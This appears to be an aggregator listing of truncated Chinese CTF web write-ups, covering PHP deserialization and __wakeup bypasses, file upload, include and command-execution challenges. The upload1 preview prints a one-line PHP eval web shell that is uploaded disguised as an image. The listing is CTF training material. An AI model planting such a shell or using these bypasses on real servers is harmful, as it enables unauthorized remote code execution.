web_php_unserialize web_xctf_writeup unserialize

Web_XCTF_WriteUp | Web_php_unserialize

题目 分析 浅读一下 php 代码: <?php class Demo { // Demo类 private $file = 'index.php'; // 私有变量file赋为字符串index.php public function __construct($file) { // 构建公有函数__ ......

Web_XCTF_WriteUp | upload1

题目 分析 根据题目可知该题考查文件上传漏洞。 用 BurpSuite 的内置浏览器打开环境。 新建记事本编写一句话木马脚本: <?php @eval($_POST['r00ts']);?> 保存为 jpg 格式。 打开拦截,上传脚本。拦截到数据包: 将脚本后缀名更改为 php 后放行: 打开中国蚁 ......
Web_XCTF_WriteUp WriteUp upload1 upload XCTF

Web_XCTF_WriteUp | Web_php_include

题目 分析 对 php 代码进行分析: <?php // php开头 show_source(__FILE__); // 对当前源文件进行高亮显示 echo $_GET['hello']; // 收集get表单中hello的数据输出 $page=$_GET['page']; // 将get表单中pa ......

Web_XCTF_WriteUp | unserialize3

题目 分析 根据题目指向,这题是反序列化漏洞。 分析代码: class xctf{ public $flag = '111'; // 变量flag初始化为111 public function __wakeup(){ // “__wakeup”:PHP魔术方法,在序列化后立即被调用 exit('ba ......

Web_XCTF_WriteUp | ics-06

题目 提示: 云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。 题目: 分析 到处点了点,结果都是跳转回原页面。 打开 F12,发现 html 文档里的按钮大多没有链接到其他目标,除了报表中心: 点进报表中心,发现这个送分题的确认按钮也不会跳转: 查看数据包 ......
Web_XCTF_WriteUp WriteUp XCTF Web ics

Web_XCTF_WriteUp | PHP2

题目 分析 尝试 url 接弱密码和找 php 源码,坐牢 1h。 看了大佬的 WP 才知道 php 源码文件扩展名是 phps,于是将 url 接上 /index.phps 找到源码: 整理一下代码,大致意思是: if("admin" $_GET[id]) { // 如果传入的id值为字符串adm ......
Web_XCTF_WriteUp WriteUp PHP2 XCTF Web

Web_XCTF_WriteUp | simple_js

题目 提示: 小宁发现了一个网页,但却一直输不对密码。(Flag格式为 Cyberpeace{xxxxxxxxx} ) 题目: 分析 F12 打开查看器找到一串 JS 代码: 分析一下大致意思: function dechiffre(pass_enc){ var pass = "70,65,85,8 ......

Web_XCTF_WriteUp | baby_web

题目 提示: 想想初始页面是哪个 题目: 分析 看到提示首先想到的是把 /1.php 删掉: 但还是回到这里。 打开 F12 再跑了一遍,拦截到三个包: 检查每个包,在 302 状态码包里找到 flag: Flag flag{very_baby_web} 参考 HTTP 状态码-菜鸟教程 ......
Web_XCTF_WriteUp baby_web WriteUp XCTF baby

Web_XCTF_WriteUp | Training-WWW-Robots

题目 分析 标题大致翻译: 训练 WWW 网络爬虫。 场景内部文段大致翻译: 在这个小小的训练挑战中,您将学习 Robots_exclusion_standard(网络爬虫排除标准)。 robots.txt 文件用于网络爬虫检查它们是否被允许抓取和索引您的网站或仅部分网站。 有时,这些文件揭示了目录 ......

Web_XCTF_WriteUp | xff_referer

题目 提示: X老师告诉小宁其实xff和referer是可以伪造的。 题目: 分析 根据提示的内容,了解了一下 xff 和 referer。 xff:X-Forwarded-For,是一个 HTTP 扩展头部。用来表示 HTTP 请求端真实 IP。 格式:X-Forwarded-For: clien ......

Web_XCTF_WriteUp | command_execution

题目 提示: 小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。 题目: 分析 简单了解了一下 waf,全称 Web 应用防火墙(Web Application Firewall),工作在应用层。其功能包括: 禁止HTTP协议的非安全方法 伪装Web服务的特征 防止 ......

【?】Web_XCTF_WriteUp | simple_php

题目 提示: 小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。 题目: 分析 读代码: <?php // php脚本的开始部分 show_source(__FILE__); // 对当前文件进行php语法高亮显示 include("config.php"); // 引用confi ......

Web_XCTF_WriteUp | weak_auth

题目 分析 输入用户名 “test”,密码 “123” 进行尝试: 确定用户名为 “admin”。此时 url 后接了一个 “check.php: 试图查看文件,但失败了: 标题的意思的弱身份验证,这……不会要靠一个个猜吧…… 浅试了下 123456,过了(啊?) 看了看佬的 WP,用 Burp S ......
Web_XCTF_WriteUp weak_auth WriteUp XCTF weak

XCTF-Web_php_unserialize

访问查看 是一道经典的反序列化题目,尝试解题,大概一下脚本,需要传入var进行反序列化 php代码会先将var传入的值进行base64解码, 然后进行perg_match()正则匹配判断,如果匹配成立就执行die()方法终止脚本运行 使用unserialize()方法反序列化我们传入的值 __wak ......

Web_XCTF_WriteUp | pure_color

题目 分析 给了个纯白 png 图片,看来是图片隐写题。 按照隐写题的解题思路,依次进行了: 打开图片属性寻找 flag:未果 用 010 Editor 打开文件代码寻找 flag 及 查看文件的开头/结束标志:没有找到 flag,标志也分别是 png 文件的开头/结束标志,没有异常 因为这两天重装 ......

ctfshow 卷王杯 easy unserialize

<?php include("./HappyYear.php"); class one { public $object; public function MeMeMe() { array_walk($this, function($fn, $prev){ if ($fn[0] "Happy_fun ......
unserialize ctfshow easy

CTFer blogs--Web-unserialize3

题目来源于攻防世界 解法步骤: 打开后观察代码可以发现我们必须要在调用xctf时绕过__wakeup,但我们知道 wakeup()会在unserialize时自动调用。 所以本题的目标就是要在反序列化时绕过wakeup() 通过查阅资料发现 当 序列化的字符串中的 属性值 个数 大于 属性个数 就会 ......
Web-unserialize unserialize CTFer blogs Web

攻防世界之-Web_php_unserialize

打开靶场后网页显示 从注释可以看到flag可能存在fl4g.php中,要想返回fl4g.php需要绕过以下三个条件 1 要绕过wake up 函数__wakeup()是在反序列化操作中起作用的魔法函数,当unserialize的时候,会检查时候存在__wakeup()函数,如果存在的话,会优先调用_ ......

fastjson_1.2.24_unserializer_rce

[toc] # fastjson 1.2.24 反序列化导致任意命令执行漏洞 | 说明 | 内容 | | | | | 漏洞编号 | | | 漏洞名称 | fastjson 1.2.24 反序列化导致任意命令执行漏洞 | | 漏洞评级 | | | 影响范围 | | | 漏洞描述 | | | 修复方案 ......

unserialize3

# unserialize3 writeup ## php 序列化 序列化是程序类型转化为字符串的过程 ### 字符串的序列化 ```php ``` 得到的输出是 ```php s:7:"faraday"; ``` 可以统一表达为正则的形式 ```regex '/s:[0-9]+:"[^"]+";/ ......
unserialize3 unserialize

CTFer成长记录——CTF之Web专题·攻防世界-Web_php_unserialize

一、题目链接 https://adworld.xctf.org.cn/challenges/list 二、解法步骤 本题考察的是反序列化,反序列化的题都需要审计php代码,步骤也比较固定。 <?php if (isset($_GET['var'])) { $var = base64_decode($ ......

[SWPUCTF 2021 新生赛]ez_unserialize

[SWPUCTF 2021 新生赛]ez_unserialize 题目来源:nssctf 题目类型:web 涉及考点:PHP反序列化 1. 检查一下源代码,发现Disallow: 猜测大概有`robots.txt`,扫下后台看看: 额,flag.php都扫出来了,但是进不去,还是老老实实看robot ......

攻防世界unserialize3题解

首先看题目知道是一道反序列化的题,说实话对于我这种菜鸡也是有点难度,这篇文章也是给像我一样的菜鸡写的,听大佬说写文章也是一种学习方式就试一下各位大佬轻点 #1概述 1.首先说到反序列化在这里给大家提一嘴反序列化作用,压缩格式化储存在数据传输中会比较方便,我们把一个东西放在磁盘里我们要用的时候可以随时 ......
题解 unserialize3 unserialize 世界

unserialize3

看着这个源码长度,就觉着比较简单 本题就一个__wakeup方法需要绕过,但是不对哦没有提示也不知道该参数得多少呀 本来都要复制进编译器写了,发现源码闭合有点问题,可能是做了隐藏 解题步骤 实在找不到了,就尝试了一下flag=111直接利用code传参 class xctf{ public $fla ......
unserialize3 unserialize

WP CTF-Web 攻防世界 GFSJ0235 unserialize3

#「场景」 进入场景: ``` class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= ``` #「思路」 根据题目提示——反序列化 已知PHP在进行反序列化前,会检查是 ......
unserialize3 unserialize CTF-Web 世界 0235

[SWPUCTF 2021 新生赛]ez_unserialize

题目在哪呢?查看源代码试试 User-agent: * Disallow: 什么东西呢 发现disallow Robots 协议(也称为爬虫协议、机器人协议等)的全称是 “网络爬虫排除标准”(Robots Exclusion Protocol),网站通过 Robots 协议告诉搜索引擎哪些页面可抓, ......
共26篇  :1/1页 首页上一页1下一页尾页